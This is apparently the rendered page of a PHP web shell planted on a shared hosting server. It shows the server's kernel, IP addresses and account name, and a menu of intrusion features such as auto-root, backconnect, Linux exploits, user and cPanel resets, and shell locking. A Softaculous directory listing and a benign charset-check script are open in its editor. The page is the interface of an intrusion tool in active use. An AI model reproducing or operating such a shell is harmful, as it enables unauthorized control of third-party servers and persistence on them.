Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 3.15.6.140
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
sp /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
.htaccess
184
B
-rw-r--r--
_index.php
37
B
-rw-r--r--
check_charset.php
1.97
KB
-rw-r--r--
clone.php
12.9
KB
-rw-r--r--
edit.php
3.53
KB
-rw-r--r--
edit.xml
269
B
-rw-r--r--
editor.zip
21.15
MB
-rw-r--r--
extend.php
2.51
KB
-rw-r--r--
fileindex.php
32
B
-rw-r--r--
import.php
3.09
KB
-rw-r--r--
index.php
1.21
KB
-rw-r--r--
info.xml
20.3
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
24.62
KB
-rw-r--r--
install.xml
5.3
KB
-rw-r--r--
md5
1.98
KB
-rw-r--r--
post_download.json
95
B
-rw-r--r--
sign_on_func.php
2.13
KB
-rw-r--r--
soft.htaccess
124
B
-rw-r--r--
sp.sql
21.1
KB
-rw-r--r--
sp.zip
281
B
-rw-r--r--
upgrade.php
3.26
KB
-rw-r--r--
upgrade.xml
231
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : check_charset.php
<?php function __has_cap(){ global $use_mysqli; $use_mysqli = false; if ( function_exists( 'mysqli_connect' ) ) { if ( version_compare( phpversion(), '5.5', '>=' ) || ! function_exists( 'mysql_connect' ) ) { $use_mysqli = true; } elseif ( false !== strpos( '[[wpver]]', '-' ) ) { $use_mysqli = true; } } $version = __db_version(); if ( version_compare( $version, '5.5.3', '<' ) ) { return false; } if ( $use_mysqli ) { $client_version = mysqli_get_client_info(); } else { $client_version = mysql_get_client_info(); } /* * libmysql has supported utf8mb4 since 5.5.3, same as the MySQL server. * mysqlnd has supported utf8mb4 since 5.0.9. */ if ( false !== strpos( $client_version, 'mysqlnd' ) ) { $client_version = preg_replace( '/^\D+([\d.]+).*/', '$1', $client_version ); return version_compare( $client_version, '5.0.9', '>=' ); } else { return version_compare( $client_version, '5.5.3', '>=' ); } return false; } function __db_version() { global $use_mysqli; if ( $use_mysqli ) { $server_info = mysqli_get_server_info( mysqli_connect("[[softdbhost]]","[[softdbuser]]","[[softdbpass]]","[[softdb]]")); } else { $server_info = mysql_get_server_info( mysql_connect("[[softdbhost]]","[[softdbuser]]","[[softdbpass]]","[[softdb]]")); } return preg_replace( '/[^0-9.].*/', '', $server_info ); } $has_cap = __has_cap(); if(!empty($has_cap)){ echo '<claim_utf8>utf8mb4</claim_utf8>'; } // Server detection /** * Whether the server software is Apache or something else * @global bool $soft_is_apache */ $soft_is_apache = (strpos($_SERVER['SERVER_SOFTWARE'], 'Apache') !== false || strpos($_SERVER['SERVER_SOFTWARE'], 'LiteSpeed') !== false); if(!empty($soft_is_apache)){ echo '<soft_apache>soft_is_apache</soft_apache>'; }else{ echo '<soft_apache>soft_not_apache</soft_apache>'; } if(include_once('[[editor_path]]/site-inc/open_basedir.php')){ if(!empty($included)){ echo '<soft_open_basedir>SP_OBD_SUPPORTED</soft_open_basedir>'; } }
Close